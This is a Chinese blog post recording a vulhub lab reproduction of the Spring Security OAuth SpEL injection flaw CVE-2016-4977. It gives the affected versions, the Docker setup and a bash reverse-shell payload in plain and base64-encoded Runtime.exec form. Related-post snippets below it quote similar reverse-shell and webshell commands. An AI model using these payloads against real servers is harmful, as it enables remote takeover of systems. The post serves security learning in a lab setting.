vulhub-CVE-2016-4977-SpringSecurityOauth RCE复现记录

最新推荐文章于 2025-05-13 17:00:46 发布
原创 最新推荐文章于 2025-05-13 17:00:46 发布 · 352 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。

本文详细介绍了如何通过CVE-2016-4977漏洞利用Spring Security OAuth,实现对Spring Security OAuth1.0至2.3版本的攻击,包括步骤复现、payload构造及反弹shell过程。重点展示了如何利用base64编码和特定payload进行漏洞触发。

https://www.cnblogs.com/litlife/p/10380701.html
https://blog.csdn.net/qq_45300786/article/details/119249422

参考别人的博客,对CVE-2016-4977进行复现
Spring Security OAuth SpEL表达式注入
影响范围(复制来的):

Spring Security OAuth 1.0.0到1.0.5
Spring Security OAuth 2.0.0到2.0.9
Spring Security OAuth 2.0到2.0.14
Spring Security OAuth 2.1到2.1.1
Spring Security OAuth 2.2到2.2.1
Spring Security OAuth 2.3到2.3.2

运行docker

docker-compose up -d

服务器访问地址:

http://192.168.159.144:8080/oauth/authorize

在这里插入图片描述

admin/admin

在这里插入图片描述
反弹shell(其他利用方式看引用的博客,这里仅复现反弹shell)
payload

bash -i >& /dev/tcp/192.168.159.144/6666 0>&1

base64编码

http://www.jackson-t.ca/runtime-exec-payloads.html

得到

bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjE1OS4xNDQvNjY2NiAwPiYx}|{base64,-d}|{bash,-i}

使用poc.py生成payload
在这里插入图片描述

设置监听
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

[ vulhub漏洞复现篇 ] solr 远程命令执行 (CVE-2017-12629-RCE)
qq_51577576的博客
12-07 873
[ vulhub漏洞复现篇 ] solr 远程命令执行 (CVE-2017-12629-RCE) Apache Solr 是Apache开发的一个开源的基于Lucene的全文搜索服务器。其集合的配置方法(config路径)可以增加和修改监听器,通过RunExecutableListener执行任意系统命令。
Spring Security OAuth2 远程命令执行漏洞(CVE-2016-4977
qq_54713392的博客
05-08 902
Spring Security OAuth2 远程命令执行漏洞(CVE-2016-4977) 漏洞原理: Spring Security OAuth2处理认证请求的时候如果使用了whitelabel视图,response_type参数值会被当做Spring SpEL来执行,恶意攻击者通过构造response_type值可以触发远程代码执行漏洞 攻击机:window10 IP:192.168.32.1 靶机:ubantu16.04 IP:192.168.32.142 (1)在vulhub靶场...
CVE-2016-4977RCE漏洞)
datong_dasima的博客
02-19 529
其中YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjExLjE0MS82OSAwPiYx是进行了base64编码,解码后就是经典反弹shell命令:bash -i >& /dev/tcp/192.168.11.141/4444 0>&1。2.用棱角社区制作反弹shell,ip和端口都是kali的:192.168.11.141:69。显示了4*4的结果,说明可以执行我们自己的代码,那我们想获取对方shell。将其拼接到url里,注意url里面不要有换行符。然后,执行poc.py。
用Docker复现SpringBoot CVE-2016-4977
m0_69555575的博客
08-22 819
Docker复现SpringBoot CVE-2016-4977
Spring Security OAuth2 远程命令执行漏洞(CVE-2016-4977
黑白的博客
12-20 2253
声明 好好学习,天天向上 漏洞描述 Spring Security OAuth 是为 Spring 框架提供安全认证支持的一个模块。在其使用 whitelabel views 来处理错误时,由于使用了Springs Expression Language (SpEL),攻击者在被授权的情况下可以通过构造恶意参数来远程执行命令。 影响范围 2.0.0-2.0.9 1.0.0-1.0.5 复现过程 这里使用2.0.8版本 使用vulhub cd /app/vulhub-master/spring/CVE-201
Shiro-CVE-2016-4437 漏洞复现vulhub靶场搭建)
zzxyccxc的博客
09-12 1616
Apache Shiro框架提供了记住密码的功能(RememberMe),用户登录成功后会将用户信息加密,加密过程:用户信息=>序列化=>AES加密=>base64编码=>RememberMe Cookie值。
vulhub-phpmyadmin中CVE-2016-5734
qq_26947429的博客
07-23 803
CVE-2016-5734远程代码执行漏洞 影响版的本phpmyadmin4.3.0-4.6.2 看到phpmyadmin登陆页面爆破拿到用户名密码root,root 利用poc进行命令执行 写入一句话进行菜刀连接 python27 CVE-2016-5734.py -u root -p "root" http://xx.xx.xx.xx:8080 -c "file_put_contents('shell.php',base64_decode('PD9waHAgZXZhbCgkX1BPU1RbY21kX
vulhub-jboss-CVE-2017-12149漏洞复现
m0_62008601的博客
09-18 2112
Jboss是一个基于J2EE的开放源代码的应用服务器。JBoss代码遵循LGPL许可,可以在任何商业应用中免费使用。JBoss是一个管理EJB的容器和服务器,支持EJB 1.1、EJB 2.0和EJB3的规范。Jboss属于redhat公司,而且jboss是开源的,免费的,且在J2EE应用服务器领域,JBoss是发展最为迅速的应用服务器,所以曾经广为流行。该漏洞出现在请求中,服务器将用户提交的POST内容进行了Java反序列化:(该图像来源于vulhub官方wp中)
cve-2016-4977(spring-security-oauth) RCE漏洞复现
m0_58596609的博客
04-21 6153
cve-2016-4977(spring-security-oauth) RCE漏洞复现
CVE-2016-4977(Spring-Security-Oauth)RCE远程命令执行漏洞复现(超详细版!)
精品博客,你值得一看~
09-02 2181
它是为了解决企业应用开发的复杂性而创建的。Spring Security OAuth2处理认证请求的时候如果使用了whitelabel视图,response_type参数值会被当做Spring SpEL来执行,恶意攻击者通过构造response_type值可以触发远程代码执行漏洞。#按 " i "进行编辑 ,然后复制下面的脚本 , 再按 " Esc "键 ,再按冒号wq " :wq " 保存并退出.先cd到spring目录下的CVE-2016-4977里面,然后使用docker-compose启动环境.
CVE-2016-4977 Spring远程代码执行漏洞复现 POC、EXP在文末
weixin_45715461的博客
08-10 1707
CVE-2016-4977 Spring远程代码执行漏洞复现 POC、EXP在文末
vulhub spring 远程命令执行漏洞(CVE-2016-4977
shw_yzh的博客
09-08 813
spring 远程命令执行漏洞(CVE-2016-4977
CVE-2016-4977 Spring security OAuth2 远程命令执行
flighting019的博客
10-26 151
由于是从幕布导出来的,格式有点乱,大家见谅。至于关闭容器,退出就不多说了。该poc.py的代码如下。
CVE-2016-4977源码分析与漏洞复现
spinage的博客
05-13 976
CVE-2016-4977 是 Spring Security OAuth 模块中的一个高危远程代码执行漏洞,影响版本为 1.0.0–1.0.5 和 2.0.0–2.0.9。攻击者通过构造恶意 SpEL 表达式注入到错误处理流程中,触发远程命令执行。漏洞成因在于 WhitelabelErrorEndpoint 在处理错误信息时未对用户输入进行过滤,直接通过 SpelView 渲染模板,导致 SpEL 表达式被解析执行。攻击者可通过递归解析 ${} 内容绕过防御机制,执行任意命令。修复方案包括升级至安全版本、
CVE-2016-4977Spring Security OAuth2 远程命令执行漏洞
weixin_54376843的博客
08-29 483
在其使用 whitelabel views 来处理错误时,由于使用了Springs Expression Language (SpEL),攻击者在被授权的情况下可以通过构造恶意参数来远程执行命令。然后输入构造好的反弹shell命令,回车继续执行。把执行结果粘贴出来,放在下面的payload中。将命令base64编码【随便找一个编码的网站。执行上面的脚本【在放脚本的目录下执行】输入账号密码admin admin。【攻击机IP+开启监听的端口】构造反弹shell命令【备用】最后去靶机关闭docker容器。
Spring漏洞(CVE-2016-4977)在IDEA中复现
wxzyyds的博客
11-03 1415
复现Spring(CVE-2016-4977),并且在IDEA中实现动态调试
Spring Security OAuth2 远程命令执行漏洞 CVE-2016-4977 漏洞复现
ADummy的博客
03-02 374
Spring Security OAuth2 远程命令执行漏洞(CVE-2016-4977) by ADummy 0x00利用路线 ​ burpuite抓包—>改包—>SpEL命令执行 0x01漏洞介绍 ​ Spring Security OAuth 是为 Spring 框架提供安全认证支持的一个模块。在其使用 whitelabel views 来处理错误时,由于使用了Springs Expression Language (SpEL),攻击者在被授权的情况下可以通过构造恶意参数来远程执
vulhub复现CVE-2021-4034
最新发布
08-27
以下是在 Vulhub复现 CVE-2021-4034 漏洞的具体步骤: ### 准备环境 1. 确保系统中已安装必要的依赖环境,包括: - Docker - Docker Compose 2. 下载 Vulhub 项目到本地: ```bash git clone ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值